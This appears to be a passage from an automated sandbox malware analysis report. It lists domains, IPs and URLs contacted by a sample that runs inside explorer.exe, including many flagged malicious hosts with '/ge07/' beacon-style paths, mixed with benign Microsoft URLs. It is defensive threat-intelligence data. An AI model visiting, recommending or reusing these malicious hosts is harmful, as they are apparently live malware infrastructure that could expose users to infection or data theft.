https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://api.msn.com/q	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	0%	URL Reputation	safe
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	0%	URL Reputation	safe
https://aka.ms/Vh5j3k	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
yegle.net	216.239.32.52	true	false	unknown
94950.bodis.com	199.59.243.227	true	true	unknown
www.pm-22-ns-2.click	unknown	unknown	true	unknown
www.yegle.net	unknown	unknown	true	unknown
www.rkgexg.top	unknown	unknown	true	unknown
www.9net88.net	unknown	unknown	true	unknown
www.lasterdeals.shop	unknown	unknown	true	unknown
www.zoc-marriage.xyz	unknown	unknown	true	unknown
www.ocockbowerlybrawer.cfd	unknown	unknown	true	unknown
www.ool-covers76.xyz	unknown	unknown	true	unknown
www.iscinddocenaemlynne.cfd	unknown	unknown	true	unknown
www.ivglass.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.yegle.net/ge07/?bb=jzpSmAmxAHuMrBYVYK/iobfyuTkKVe1DkRFizLdS8mEnIcKQ83L44yYAyf2Gtg0WJqSR&AZFdK=5jGt1VUhS4spDnR	false	unknown
www.9net88.net/ge07/	true	unknown
http://www.9net88.net/ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pm-22-ns-2.click/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ivglass.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyz/ge07/www.iscinddocenaemlynne.cfd	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pipagtxcorrelo.xyz/ge07/www.ecurityemployment.today	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lasterdeals.shop/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zoc-marriage.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ocockbowerlybrawer.cfd/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyz/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ivglass.xyz/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rkgexg.top/ge07/www.ocockbowerlybrawer.cfd	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.f7y2i9fgm.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.zoc-marriage.xyz/ge07/www.ivglass.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ocockbowerlybrawer.cfd	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.giyztm.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ithin-ksvodn.xyz/ge07/www.pipagtxcorrelo.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pipagtxcorrelo.xyz/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.yegle.net/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000003.00000000.1848448919.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ool-covers76.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000003.3105701317.000000000C9BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114249246.000000000C9EB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1848448919.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ecurityemployment.today/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://wns.windows.com/L	explorer.exe, 00000003.00000000.1848448919.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.com	explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.rkgexg.top	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cillascrewedsedroth.cfd/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ithin-ksvodn.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ithin-ksvodn.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ivglass.xyz/ge07/www.pm-22-ns-2.click	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ithin-ksvodn.xyz/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zoc-marriage.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.f7y2i9fgm.xyz/ge07/	explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.cillascrewedsedroth.cfdReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lasterdeals.shop/ge07/www.rkgexg.top	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.iscinddocenaemlynne.cfd/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pm-22-ns-2.click	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ecurityemployment.today	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ecurityemployment.today/ge07/www.f7y2i9fgm.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ool-covers76.xyz/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lasterdeals.shopReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.netReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.yegle.net/ge07/www.giyztm.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ool-covers76.xyz/ge07/www.9net88.net	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pipagtxcorrelo.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pm-22-ns-2.click/ge07/www.cillascrewedsedroth.cfd	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pipagtxcorrelo.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000003.00000002.4134940464.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4134269586.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1845690815.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cillascrewedsedroth.cfd	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.net/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ool-covers76.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cillascrewedsedroth.cfd/ge07/www.ithin-ksvodn.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ocockbowerlybrawer.cfdReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.giyztm.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.iscinddocenaemlynne.cfd	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.pm-22-ns-2.clickReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
